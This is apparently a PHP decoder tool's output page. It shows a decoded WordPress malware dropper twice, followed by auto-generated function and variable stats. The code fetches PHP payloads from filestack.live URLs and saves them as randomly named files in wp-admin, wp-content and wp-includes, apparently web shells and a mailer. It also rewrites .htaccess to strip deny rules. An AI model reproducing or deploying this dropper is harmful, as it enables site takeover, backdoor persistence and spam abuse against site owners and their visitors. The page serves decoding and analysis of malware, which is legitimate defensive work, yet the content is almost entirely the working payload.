Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

error_reporting(0); $p_olux = str_replace("../", "", "./../../../wp-admin/Zxolt4NmTc8.php"..

Decoded Output download

<?  error_reporting(0); $p_olux = str_replace("../", "", "./../../../wp-admin/Zxolt4NmTc8.php"); $p_mailer = str_replace("../", "", "./../../../wp-content/zRluLHSoNit.php"); $p_xleet = str_replace("../", "", "./../../../wp-includes/rjzTOcuAF87.php"); $root = str_replace("../", "", "./../../../"); function http_get_contents($url){$codex = file_get_contents($url);if (empty($codex)){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);curl_setopt($ch, CURLOPT_TIMEOUT, 60);curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);$urlPage = curl_exec($ch);curl_close($ch);return($urlPage);}else {return $codex;}} function save($path, $source){ if(function_exists("file_put_contents")){ file_put_contents($path, $source); }else { fwrite(fopen($path,"w"), $source); } } function read($path){ if(function_exists("file_get_contents")){ $rr = file_get_contents($path); }else { $rr = stream_get_contents(fopen($path, "r")); } return $rr; } if(!file_exists($p_olux)) { $olux = http_get_contents("http://filestack.live/5de9c03400251a73ad64a272db83fab0.htm"); if(preg_match("/<\?php/", $olux)){ save($p_olux, $olux); }  } if(!file_exists($p_xleet)) { $xleet = http_get_contents("http://filestack.live/2995e3adc0c914b5a67cc9c6fb40ad73.htm"); if(preg_match("/<\?php/", $xleet)){ save($p_xleet, $xleet); }  } if(!file_exists($p_mailer)) { $mailer = http_get_contents("https://filestack.live/79f37cf98ac7d864a573c96fd19390ba.htm"); if(preg_match("/<\?php/", $mailer)){ $mailer = str_replace("xxxxxxxxxxxxxxxxxxxxxxx", "ArUHCRhbE3N", $mailer); save($p_mailer, $mailer); }  } save($root."wp-includes/index.html", "<!DOCTYPE html><title></title>"); $htx = strtolower(read($root.".htaccess")); if(preg_match("/deny(.*)from(.*)all/", $htx) || preg_match("/order(.*)allow(.*)deny/", $htx)) { $htx = "<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php\$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>"; chmod($root.".htaccess", 0644); save($root.".htaccess", $htx); } ?>

Did this file decode correctly?

Original Code

error_reporting(0); $p_olux = str_replace("../", "", "./../../../wp-admin/Zxolt4NmTc8.php"); $p_mailer = str_replace("../", "", "./../../../wp-content/zRluLHSoNit.php"); $p_xleet = str_replace("../", "", "./../../../wp-includes/rjzTOcuAF87.php"); $root = str_replace("../", "", "./../../../"); function http_get_contents($url){$codex = file_get_contents($url);if (empty($codex)){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);curl_setopt($ch, CURLOPT_TIMEOUT, 60);curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);$urlPage = curl_exec($ch);curl_close($ch);return($urlPage);}else {return $codex;}} function save($path, $source){ if(function_exists("file_put_contents")){ file_put_contents($path, $source); }else { fwrite(fopen($path,"w"), $source); } } function read($path){ if(function_exists("file_get_contents")){ $rr = file_get_contents($path); }else { $rr = stream_get_contents(fopen($path, "r")); } return $rr; } if(!file_exists($p_olux)) { $olux = http_get_contents("http://filestack.live/5de9c03400251a73ad64a272db83fab0.htm"); if(preg_match("/<\?php/", $olux)){ save($p_olux, $olux); }  } if(!file_exists($p_xleet)) { $xleet = http_get_contents("http://filestack.live/2995e3adc0c914b5a67cc9c6fb40ad73.htm"); if(preg_match("/<\?php/", $xleet)){ save($p_xleet, $xleet); }  } if(!file_exists($p_mailer)) { $mailer = http_get_contents("https://filestack.live/79f37cf98ac7d864a573c96fd19390ba.htm"); if(preg_match("/<\?php/", $mailer)){ $mailer = str_replace("xxxxxxxxxxxxxxxxxxxxxxx", "ArUHCRhbE3N", $mailer); save($p_mailer, $mailer); }  } save($root."wp-includes/index.html", "<!DOCTYPE html><title></title>"); $htx = strtolower(read($root.".htaccess")); if(preg_match("/deny(.*)from(.*)all/", $htx) || preg_match("/order(.*)allow(.*)deny/", $htx)) { $htx = "<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteBase /\nRewriteRule ^index\.php\$ - [L]\nRewriteCond %{REQUEST_FILENAME} !-f\nRewriteCond %{REQUEST_FILENAME} !-d\nRewriteRule . /index.php [L]\n</IfModule>"; chmod($root.".htaccess", 0644); save($root.".htaccess", $htx); }

Function Calls

save 1
fopen 1
fwrite 1
file_exists 3
str_replace 4
error_reporting 1
function_exists 1

Variables

$path ./wp-includes/index.html
$root ./
$p_olux ./wp-admin/Zxolt4NmTc8.php
$source <!DOCTYPE html><title></title>
$p_xleet ./wp-includes/rjzTOcuAF87.php
$p_mailer ./wp-content/zRluLHSoNit.php

Stats

MD5 338e3db83d3b844cda1f845a614cd5ef
Eval Count 0
Decode Time 85 ms